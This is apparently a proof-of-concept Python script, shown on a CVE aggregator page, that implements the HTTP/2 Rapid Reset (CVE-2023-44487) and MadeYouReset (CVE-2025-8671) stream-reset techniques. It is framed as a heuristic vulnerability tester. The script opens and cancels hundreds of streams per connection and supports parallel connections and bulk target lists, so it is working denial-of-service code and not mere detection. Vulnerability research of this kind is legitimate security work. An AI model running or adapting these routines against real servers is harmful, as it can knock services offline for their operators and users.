4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / main.py PY
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import ssl
import socket
import time
from urllib.parse import urlparse
from datetime import datetime
import json
import csv
import random

from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import (
    SettingsAcknowledged, ConnectionTerminated,
    PingAckReceived, WindowUpdated, RemoteSettingsChanged
)
from colorama import Fore, Style, init
# Initialise colorama at import time; autoreset=True asks it to reset the
# colour/style state after each print so styling does not leak between lines.
init(autoreset=True)

def print_banner():
    """Print the coloured ASCII-art banner followed by the tool and author lines."""
    # The art below is whitespace-sensitive (including trailing spaces); keep it verbatim.
    banner = f"""
{Fore.CYAN}{Style.BRIGHT}


╔╦╗┌─┐┌┬┐┌─┐╦ ╦┌─┐┬ ┬╦═╗┌─┐┌─┐┌─┐┌┬┐
║║║├─┤ ││├┤ ╚╦╝│ ││ │╠╦╝├┤ └─┐├┤  │ 
╩ ╩┴ ┴─┴┘└─┘ ╩ └─┘└─┘╩╚═└─┘└─┘└─┘ ┴ 
{Style.RESET_ALL}
    """
    print(banner)
    print(f"{Fore.YELLOW}[ HTTP/2 DDoS Heuristic Tester | CVE-2023-44487 & CVE-2025-8671 ]{Style.RESET_ALL}\n")
    print(f"{Fore.WHITE}[ [email protected] | m10sec 2025 ]{Style.RESET_ALL}\n")

def check_http2_support(host, port=443, tls=True, timeout=5.0):
    """Return True if the host negotiates HTTP/2 ("h2") via TLS ALPN.

    Args:
        host: Host name or IP address to connect to (also sent as SNI).
        port: TCP port to connect to.
        tls: When False the TCP connection is still attempted, but the result
            is always False because ALPN only exists inside a TLS handshake
            (cleartext h2c is not probed).
        timeout: Socket timeout in seconds for the connect and the handshake.

    Returns:
        True only when the TLS handshake completes and the server selected
        "h2"; False for any other outcome, including every connection error.
    """
    try:
        # Context managers guarantee both sockets are closed on every path,
        # including a failure between the TCP connect and the TLS handshake.
        with socket.create_connection((host, port), timeout=timeout) as raw:
            if not tls:
                return False
            ctx = ssl.create_default_context()
            ctx.set_alpn_protocols(["h2", "http/1.1"])
            # Certificate validation is disabled: only the ALPN result is of
            # interest. check_hostname must be cleared before CERT_NONE is set.
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            with ctx.wrap_socket(raw, server_hostname=host) as tls_sock:
                return tls_sock.selected_alpn_protocol() == "h2"
    except Exception:
        # Best-effort probe: any failure (DNS, refused, timeout, TLS, bad
        # arguments) is reported as "no HTTP/2 support".
        return False


class H2Client:
    """Blocking HTTP/2 client for one connection that records heuristic metrics.

    The client drives an ``h2`` ``H2Connection`` state machine over a plain or
    TLS-wrapped socket and accumulates observations in ``self.metrics``:

    * ``goaway`` / ``goaway_codes``: GOAWAY frames seen and their error codes.
    * ``rst_sent`` / ``streams_opened``: streams opened and reset whose frames
      were handed to the socket successfully (cumulative over all routines).
    * ``rst_rate_per_s``: reset rate of the most recently executed routine.
    * ``pings`` / ``ping_rtt_ms``: PING frames sent and measured round trips
      in milliseconds (-1 when an acknowledgement could not be decoded).
    * ``remote_max_concurrent_streams``: last SETTINGS_MAX_CONCURRENT_STREAMS
      value received from the peer, or None if it never sent one.
    * ``throttled``: True once a GOAWAY carrying ENHANCE_YOUR_CALM (0xb) or
      PROTOCOL_ERROR (0x1) is received.
    * ``errors``: textual record of send/receive/protocol failures.

    TLS certificate and host name verification are disabled in ``_wrap_tls``.
    """

    def __init__(self, host, port, tls=True, server_name=None, timeout=6.0):
        """Store connection parameters; no I/O happens until ``connect()``.

        Args:
            host: Host name or IP address to connect to.
            port: TCP port.
            tls: Wrap the socket in TLS (with ALPN) when True.
            server_name: SNI value; defaults to ``host``.
            timeout: Default socket timeout in seconds.
        """
        self.host = host
        self.port = port
        self.tls = tls
        self.server_name = server_name or host
        self.timeout = timeout
        self.sock = None
        self.conn = None
        self.metrics = {
            "goaway": 0,
            "goaway_codes": [],
            "rst_sent": 0,
            "rst_rate_per_s": 0.0,
            "streams_opened": 0,
            "pings": 0,
            "ping_rtt_ms": [],
            "remote_max_concurrent_streams": None,
            "throttled": False,
            "errors": []
        }

    def _wrap_tls(self, raw):
        """Wrap ``raw`` in a TLS socket offering "h2" and "http/1.1" via ALPN."""
        ctx = ssl.create_default_context()
        # Offer both h2 and http/1.1 for broader compatibility during negotiation.
        ctx.set_alpn_protocols(["h2", "http/1.1"])
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        return ctx.wrap_socket(raw, server_hostname=self.server_name)

    def connect(self):
        """Open the socket, send the HTTP/2 preface and read the initial frames.

        Raises:
            RuntimeError: If any step fails. The socket is closed first and the
                original exception is attached as ``__cause__``.
        """
        try:
            raw = socket.create_connection((self.host, self.port), timeout=self.timeout)
            # Track the socket immediately so close() can release it if the
            # TLS handshake or the preface exchange fails.
            self.sock = raw
            if self.tls:
                self.sock = self._wrap_tls(raw)
            self.sock.settimeout(self.timeout)
            cfg = H2Configuration(client_side=True, header_encoding="utf-8")
            self.conn = H2Connection(config=cfg)
            self.conn.initiate_connection()
            self._send(self.conn.data_to_send())
            # Read whatever the server sends first (normally its SETTINGS).
            self._drain(0.2)
        except Exception as e:
            self.close()
            raise RuntimeError(f"Error conectando a {self.host}:{self.port} -> {e}") from e

    def close(self):
        """Close the socket if one was opened; safe to call repeatedly."""
        try:
            if self.sock:
                self.sock.close()
        except OSError:
            # Best-effort cleanup: nothing useful can be done if close fails.
            pass

    def _send(self, data: bytes):
        """Write ``data`` to the socket.

        Returns:
            True when there was nothing to send or the data was handed to the
            socket; False when sending failed (the error is appended to
            ``metrics["errors"]`` instead of being raised).
        """
        if not data:
            return True
        try:
            self.sock.sendall(data)
        except Exception as e:
            self.metrics["errors"].append(f"send_err:{e}")
            return False
        return True

    def _recv_within(self, wait_s):
        """Receive up to 65535 bytes, waiting at most ``wait_s`` seconds.

        A non-positive ``wait_s`` performs a single non-blocking read. The
        socket's default timeout is restored afterwards so later sends are not
        affected.

        Returns:
            The received bytes (``b""`` when the peer closed the connection),
            or None when nothing arrived in time.
        """
        self.sock.settimeout(max(wait_s, 0.0))
        try:
            return self.sock.recv(65535)
        except (socket.timeout, BlockingIOError,
                ssl.SSLWantReadError, ssl.SSLWantWriteError):
            return None
        finally:
            self.sock.settimeout(self.timeout)

    def _record_event(self, ev):
        """Update ``self.metrics`` from a single h2 event."""
        if isinstance(ev, ConnectionTerminated):
            self.metrics["goaway"] += 1
            code = getattr(ev, "error_code", None)
            if code is not None:
                self.metrics["goaway_codes"].append(code)
                if code in (0xb, 0x1):  # ENHANCE_YOUR_CALM / PROTOCOL_ERROR
                    self.metrics["throttled"] = True
        elif isinstance(ev, RemoteSettingsChanged):
            # changed_settings maps setting code -> object exposing new_value.
            changed = getattr(ev, "changed_settings", None) or {}
            for code, setting in changed.items():
                if code == 0x3:  # SETTINGS_MAX_CONCURRENT_STREAMS
                    self.metrics["remote_max_concurrent_streams"] = getattr(setting, "new_value", None)
        elif isinstance(ev, PingAckReceived):
            try:
                # ping() stores its monotonic send time in the opaque payload.
                sent_ns = int.from_bytes(ev.ping_data, "big")
                self.metrics["ping_rtt_ms"].append((time.monotonic_ns() - sent_ns) / 1e6)
            except (AttributeError, TypeError, ValueError):
                self.metrics["ping_rtt_ms"].append(-1)

    def _drain(self, dur=0.01):
        """Read and process h2 events for at most ``dur`` seconds.

        Each receive waits only for the time remaining until the deadline, so
        the call never blocks for the full socket timeout. With ``dur <= 0`` a
        single non-blocking poll is performed. Frames that h2 generates in
        response (ACKs, etc.) are sent back. Receive and processing errors are
        appended to ``metrics["errors"]`` and end the drain.
        """
        deadline = time.monotonic() + max(dur, 0.0)
        while True:
            try:
                data = self._recv_within(deadline - time.monotonic())
                if not data:
                    # None: nothing arrived in time; b"": the peer closed.
                    break
                for ev in self.conn.receive_data(data):
                    self._record_event(ev)
                # Send any frame the library produced (ACKs, etc.).
                self._send(self.conn.data_to_send())
            except Exception as e:
                self.metrics["errors"].append(str(e))
                break
            if time.monotonic() >= deadline:
                break

    def ping(self):
        """Send a PING carrying the current monotonic time and wait briefly for its ACK.

        ``H2Connection.ping`` only queues the frame, so the bytes are fetched
        with ``data_to_send()`` and written immediately; otherwise the frame
        would wait in the buffer and inflate the measured round trip.
        """
        try:
            opaque = time.monotonic_ns().to_bytes(8, "big")
            self.conn.ping(opaque)
            self._send(self.conn.data_to_send())
            self.metrics["pings"] += 1
            # Give the acknowledgement a short window to arrive.
            self._drain(0.25)
        except Exception as e:
            self.metrics["errors"].append(f"ping_err:{e}")

    def _request_headers(self, authority, path, user_agent):
        """Build the GET request header list shared by the test routines."""
        return [
            (":method", "GET"),
            (":authority", authority),
            (":scheme", "https" if self.tls else "http"),
            (":path", path),
            ("user-agent", user_agent)
        ]

    def rapid_reset(self, authority, path="/", n_streams=100, header_extra=None, pace_s=0.0):
        """CVE-2023-44487 baseline: open streams and reset each one immediately.

        Args:
            authority: Value for the ``:authority`` pseudo-header.
            path: Value for the ``:path`` pseudo-header.
            n_streams: Maximum number of streams to open and reset.
            header_extra: Optional extra ``(name, value)`` header pairs.
            pace_s: Optional pause in seconds after each stream.

        The loop stops early on the first protocol or send failure. Only
        streams whose frames were written are counted, and
        ``rst_rate_per_s`` reflects this call alone.
        """
        headers_base = self._request_headers(authority, path, "h2-check/rr")
        if header_extra:
            headers_base.extend(header_extra)

        sent_here = 0
        start = time.monotonic()
        for _ in range(n_streams):
            try:
                sid = self.conn.get_next_available_stream_id()
                # end_stream=True simulates a complete request before the reset.
                self.conn.send_headers(sid, headers_base, end_stream=True)
                self.conn.reset_stream(sid, error_code=0x8)  # CANCEL
                if not self._send(self.conn.data_to_send()):
                    # The socket is unusable; do not count unsent resets.
                    break
                sent_here += 1
                self.metrics["rst_sent"] += 1
                self.metrics["streams_opened"] += 1
                # Non-blocking poll so GOAWAY/SETTINGS are noticed mid-run.
                self._drain(0.0)
                if pace_s:
                    time.sleep(pace_s)
            except Exception as e:
                self.metrics["errors"].append(f"rapid_err:{e}")
                break
        dur = max(0.001, time.monotonic() - start)
        self.metrics["rst_rate_per_s"] = sent_here / dur
        self._drain(0.5)

    def made_you_reset_variation(self, authority, path="/", n_streams=100, jitter_ms=2):
        """CVE-2025-8671 (MadeYouReset) heuristic variation.

        For each stream this sends HEADERS with ``end_stream=False``, sleeps a
        random jitter of up to ``jitter_ms`` milliseconds and then sends
        RST_STREAM(CANCEL). Every 20th stream a PING is issued to sample RTT.

        Args:
            authority: Value for the ``:authority`` pseudo-header.
            path: Value for the ``:path`` pseudo-header.
            n_streams: Maximum number of streams to open and reset.
            jitter_ms: Upper bound of the random delay before each reset;
                negative values are treated as 0.

        The loop stops early on the first protocol or send failure. Only
        streams whose HEADERS and RST_STREAM were both written are counted,
        and ``rst_rate_per_s`` reflects this call alone.
        """
        headers_base = self._request_headers(authority, path, "h2-check/myr")
        max_jitter_s = max(0.0, jitter_ms) / 1000.0

        sent_here = 0
        start = time.monotonic()
        for i in range(n_streams):
            try:
                sid = self.conn.get_next_available_stream_id()
                # HEADERS without finishing the stream (end_stream=False).
                self.conn.send_headers(sid, headers_base, end_stream=False)
                if not self._send(self.conn.data_to_send()):
                    break
                # Small jitter before the reset.
                time.sleep(random.uniform(0, max_jitter_s))
                self.conn.reset_stream(sid, error_code=0x8)
                if not self._send(self.conn.data_to_send()):
                    break
                sent_here += 1
                self.metrics["rst_sent"] += 1
                self.metrics["streams_opened"] += 1
                if i % 20 == 0:
                    # Periodic PING to measure RTT while the test runs.
                    self.ping()
                self._drain(0.0)
            except Exception as e:
                self.metrics["errors"].append(f"myr_err:{e}")
                break
        dur = max(0.001, time.monotonic() - start)
        self.metrics["rst_rate_per_s"] = sent_here / dur
        self._drain(0.8)

def classify(metrics):
    """Turn collected connection metrics into a heuristic verdict.

    Args:
        metrics: Mapping with the keys ``goaway``, ``goaway_codes``,
            ``rst_rate_per_s``, ``remote_max_concurrent_streams`` and
            ``ping_rtt_ms``.

    Returns:
        ``"LIKELY_VULN"`` when no GOAWAY was seen, the peer advertised no
        effective stream limit, the reset rate exceeded 500/s and at least one
        valid PING round trip exceeded 200 ms; ``"POSSIBLE"`` when no
        ENHANCE_YOUR_CALM GOAWAY was seen and either the rate was high or no
        limit was advertised; ``"UNLIKELY"`` otherwise.
    """
    max_streams = metrics["remote_max_concurrent_streams"]

    go_enhance = 0xb in metrics["goaway_codes"]  # ENHANCE_YOUR_CALM
    high_rate = metrics["rst_rate_per_s"] > 500
    # None means the peer never sent SETTINGS_MAX_CONCURRENT_STREAMS, i.e. no
    # limit. A value of 0 is NOT "unlimited": it forbids opening any stream,
    # so it must not count as a missing limit.
    no_limits = max_streams is None or (isinstance(max_streams, int) and max_streams > 1000)
    # Negative entries mark PING acknowledgements that could not be decoded.
    rtt_spikes = any(rtt > 200 for rtt in metrics["ping_rtt_ms"] if rtt >= 0)

    if not metrics["goaway"] and no_limits and high_rate and rtt_spikes:
        return "LIKELY_VULN"
    if not go_enhance and (high_rate or no_limits):
        return "POSSIBLE"
    return "UNLIKELY"

def scan_for_vulnerability(target_url, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0):
    """Run the heuristic against one target and return a summary dict.

    Args:
        target_url: Target URL. A value without a scheme separator ("://") is
            treated as an https target.
        mode: "rapid", "myr" or "both" - which routine(s) to run.
        streams: Streams to open per routine.
        timeout: Socket timeout in seconds.
        jitter: Jitter in milliseconds for the "myr" routine.
        pace: Pause in seconds between streams for the "rapid" routine.

    Returns:
        Dict with the keys "Timestamp", "URL", "HTTP/2 Support", "Vulnerable"
        and "Details". Failures (invalid URL, no HTTP/2, connection errors) are
        reported through "Details" rather than raised.
    """
    result = {
        "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        "URL": target_url,
        "HTTP/2 Support": "UNKNOWN",
        "Vulnerable": "UNKNOWN",
        "Details": "No se pudo completar el análisis"
    }

    raw_target = (target_url or "").strip()
    # urlparse only fills netloc when a scheme separator is present, so a bare
    # host would otherwise end up in .path and be probed without TLS.
    if "://" not in raw_target:
        raw_target = "https://" + raw_target
    try:
        u = urlparse(raw_target)
        tls = (u.scheme == "https")
        # .hostname strips userinfo, port and IPv6 brackets; .port raises
        # ValueError for a non-numeric or out-of-range port.
        host = u.hostname or ""
        port = u.port or (443 if tls else 80)
        if not host:
            raise ValueError("falta el host")
    except ValueError as e:
        result["Details"] = f"URL inválida: {e}"
        return result

    # IPv6 literals must be bracketed inside the :authority pseudo-header.
    authority = f"[{host}]" if ":" in host else host
    # Keep the query string so the request matches the URL that was given.
    path = u.path or "/"
    if u.query:
        path = f"{path}?{u.query}"

    http2_supported = check_http2_support(host, port=port, tls=tls, timeout=timeout)
    result["HTTP/2 Support"] = "Yes" if http2_supported else "No"

    if not http2_supported:
        result["Details"] = "El servidor no negoció HTTP/2 (ALPN)."
        return result

    c = H2Client(host, port, tls=tls, server_name=host, timeout=timeout)
    try:
        c.connect()
        if mode in ("rapid", "both"):
            c.rapid_reset(authority, path=path, n_streams=streams, pace_s=pace)
        if mode in ("myr", "both"):
            c.made_you_reset_variation(authority, path=path, n_streams=streams, jitter_ms=jitter)
        verdict = classify(c.metrics)
        # Shorten the internal verdict names for the summary output.
        mapping = {"LIKELY_VULN": "LIKELY", "POSSIBLE": "POSSIBLE", "UNLIKELY": "UNLIKELY"}
        result["Vulnerable"] = mapping.get(verdict, verdict)
        result["Details"] = (
            f"streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
            f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
            f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
            f"errors={len(c.metrics['errors'])}"
        )
    except Exception as e:
        result["Vulnerable"] = "UNKNOWN"
        result["Details"] = f"Error durante prueba: {e}"
    finally:
        c.close()

    return result

def _normalize_target(s: str) -> str:
    """Return ``s`` stripped, with "https://" prepended when it has no http(s) scheme.

    The scheme is detected from the text before the first "://" (compared
    case-insensitively), not from a bare "http" prefix, so host names such as
    "httpbin.org" are correctly recognised as scheme-less. Empty or None input
    yields an empty string.
    """
    s = (s or "").strip()
    if not s:
        return s
    scheme, sep, _ = s.partition("://")
    if not sep or scheme.lower() not in ("http", "https"):
        s = "https://" + s
    return s

def interactive_menu():
    """Prompt for a test, target and parameters, run one scan and print it as JSON.

    Option 1 selects the "rapid" mode, option 2 (the default on empty input)
    "myr" and option 3 "both"; any other choice exits. Invalid or empty
    numeric answers fall back to 200 streams and 2 ms of jitter.
    """
    print("\n=== HTTP/2 DDoS Heuristic Tester ===")
    print("1) CVE-2023-44487 (Rapid Reset)")
    # MadeYouReset is CVE-2025-8671, matching the identifier shown in the banner.
    print("2) CVE-2025-8671 (MadeYouReset)")
    print("3) Ambos (comparativa)")
    print("4) Salir")
    choice = input("Selecciona opción [1-4]: ").strip() or "2"
    if choice not in {"1", "2", "3"}:
        print("Saliendo.")
        return

    target = _normalize_target(input("Target (https://dominio o http://ip): ").strip())
    if not target:
        print("No se ingresó target. Bye Bye sweet hearth.")
        return

    # Non-numeric answers (or end of input) fall back to the defaults.
    try:
        streams = int((input("Streams por conexión [200]: ") or "200").strip())
    except (ValueError, EOFError):
        streams = 200
    try:
        jitter = int((input("Jitter ms (solo MYR) [2]: ") or "2").strip())
    except (ValueError, EOFError):
        jitter = 2

    mode = {"1": "rapid", "2": "myr"}.get(choice, "both")
    summary = scan_for_vulnerability(target, mode=mode, streams=streams, jitter=jitter)
    print(json.dumps(summary, ensure_ascii=False, indent=2))

def bulk_scan_from_txt(path, mode="myr", streams=200, timeout=6.0, jitter=2, pace=0.0,
                        out_json=None, out_csv=None, line_by_line=True):
    """Scan every target listed in a text file and optionally export the results.

    Blank lines and lines starting with "#" are skipped. Each remaining line is
    normalised and scanned; a scan that raises is recorded as an UNKNOWN entry
    instead of aborting the run.

    Args:
        path: UTF-8 text file with one target per line.
        mode, streams, timeout, jitter, pace: Forwarded to the scan of each target.
        out_json: Optional path that receives all results as a JSON array.
        out_csv: Optional path that receives all results as CSV.
        line_by_line: Print each result as a JSON line as soon as it is ready.

    Returns:
        None. Read and write failures are reported on stdout.
    """
    try:
        with open(path, "r", encoding="utf-8") as handle:
            stripped = (raw_line.strip() for raw_line in handle)
            targets = [entry for entry in stripped if entry and not entry.startswith("#")]
    except Exception as read_err:
        print(f"[!] No pude leer '{path}': {read_err}")
        return

    collected = []
    for entry in targets:
        target_url = _normalize_target(entry)
        try:
            outcome = scan_for_vulnerability(target_url, mode=mode, streams=streams,
                                             timeout=timeout, jitter=jitter, pace=pace)
        except Exception as scan_err:
            # Keep going: one failing target must not stop the batch.
            outcome = {
                "Timestamp": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                "URL": target_url,
                "HTTP/2 Support": "UNKNOWN",
                "Vulnerable": "UNKNOWN",
                "Details": f"Error general: {scan_err}"
            }
        collected.append(outcome)
        if line_by_line:
            print(json.dumps(outcome, ensure_ascii=False))

    if out_json:
        try:
            with open(out_json, "w", encoding="utf-8") as json_file:
                json.dump(collected, json_file, ensure_ascii=False, indent=2)
            print(f"[+] Guardado JSON en {out_json}")
        except Exception as json_err:
            print(f"[!] No pude guardar JSON en {out_json}: {json_err}")

    if out_csv:
        columns = ["Timestamp", "URL", "HTTP/2 Support", "Vulnerable", "Details"]
        try:
            with open(out_csv, "w", encoding="utf-8", newline="") as csv_file:
                writer = csv.DictWriter(csv_file, fieldnames=columns)
                writer.writeheader()
                writer.writerows(collected)
            print(f"[+] Guardado CSV en {out_csv}")
        except Exception as csv_err:
            print(f"[!] No pude guardar CSV en {out_csv}: {csv_err}")

# -----------------------------
# Punto de entrada
# -----------------------------
def main():
    """Command-line entry point.

    Dispatch order: bulk mode when --targets-file is given; the interactive
    menu when --menu is given or no target was passed; a JSON summary when
    --json is given; otherwise the direct mode, which opens --conns
    connections up front, runs the selected routine(s) on each connection one
    after another and prints one result line per connection.
    """
    print_banner()

    ap = argparse.ArgumentParser(description="HTTP/2 MadeYouReset heuristic checker")
    ap.add_argument("target", nargs="?", help="URL objetivo, p.ej. https://example.com (opcional si usas --menu o --targets-file)")
    ap.add_argument("--path", default="/", help="Ruta a solicitar")
    # MadeYouReset is CVE-2025-8671, matching the identifier shown in the banner.
    ap.add_argument("--mode", choices=["rapid", "myr", "both"], default="myr",
                    help="Prueba: rapid (CVE-2023-44487), myr (CVE-2025-8671), both")
    ap.add_argument("--conns", type=int, default=1, help="Conexiones paralelas")
    ap.add_argument("--streams", type=int, default=200, help="Streams por conexión")
    ap.add_argument("--timeout", type=float, default=6.0, help="Timeout socket")
    ap.add_argument("--pace", type=float, default=0.0, help="Pausa entre streams (rapid)")
    ap.add_argument("--jitter", type=int, default=2, help="Jitter ms (myr)")
    ap.add_argument("--json", action="store_true", help="Salida JSON resumida (scan_for_vulnerability)")
    ap.add_argument("--menu", action="store_true", help="Abrir menú interactivo")
    ap.add_argument("--targets-file", help="Ruta a TXT con un target por línea (modo bulk)")
    ap.add_argument("--out-json", help="Guardar resultados bulk en archivo JSON")
    ap.add_argument("--out-csv", help="Guardar resultados bulk en archivo CSV")
    args = ap.parse_args()

    # Bulk mode
    if args.targets_file:
        bulk_scan_from_txt(
            args.targets_file,
            mode=args.mode,
            streams=args.streams,
            timeout=args.timeout,
            jitter=args.jitter,
            pace=args.pace,
            out_json=args.out_json,
            out_csv=args.out_csv,
            line_by_line=True,
        )
        return

    # Menu requested, or no target given
    if args.menu or not args.target:
        interactive_menu()
        return

    # Normalise the target in case the user omitted the scheme
    args.target = _normalize_target(args.target)
    try:
        u = urlparse(args.target)
        tls = (u.scheme == "https")
        # .port raises ValueError for a non-numeric or out-of-range port.
        port = u.port or (443 if tls else 80)
    except ValueError as e:
        ap.error(f"URL inválida: {e}")
    # .hostname strips userinfo, port and IPv6 brackets, so it is safe to hand
    # to the socket layer; the :authority header needs the brackets back.
    host = u.hostname or ""
    authority = f"[{host}]" if ":" in host else host

    if args.json:
        summary = scan_for_vulnerability(
            args.target,
            mode=args.mode,
            streams=args.streams,
            timeout=args.timeout,
            jitter=args.jitter,
            pace=args.pace
        )
        print(json.dumps(summary, ensure_ascii=False, indent=2))
        return

    clients = []
    try:
        for _ in range(args.conns):
            c = H2Client(host, port, tls=tls, server_name=host, timeout=args.timeout)
            try:
                c.connect()
                clients.append(c)
            except Exception as e:
                # This client never reaches `clients`, so release it here.
                c.close()
                print(f"[!] No pude crear cliente para {authority}:{port} -> {e}")

        if not clients:
            print("[!] No se pudo establecer ninguna conexión H2. Saliendo.")
            return

        for c in clients:
            if args.mode in ("rapid", "both"):
                c.rapid_reset(authority, path=args.path, n_streams=args.streams, pace_s=args.pace)
            if args.mode in ("myr", "both"):
                c.made_you_reset_variation(authority, path=args.path, n_streams=args.streams, jitter_ms=args.jitter)

        print("\n=== Resultados ===")
        for i, c in enumerate(clients, 1):
            v = classify(c.metrics)
            print(f"[Conn {i}] verdict={v} streams={c.metrics['streams_opened']} rst={c.metrics['rst_sent']} "
                  f"rate={c.metrics['rst_rate_per_s']:.1f}/s goaway={c.metrics['goaway']} "
                  f"codes={c.metrics['goaway_codes']} mcs={c.metrics['remote_max_concurrent_streams']} "
                  f"rtt_ms={','.join(f'{x:.0f}' if x>=0 else '-' for x in c.metrics['ping_rtt_ms'])} "
                  f"errors={len(c.metrics['errors'])}")
    finally:
        for c in clients:
            c.close()


# Run the CLI only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()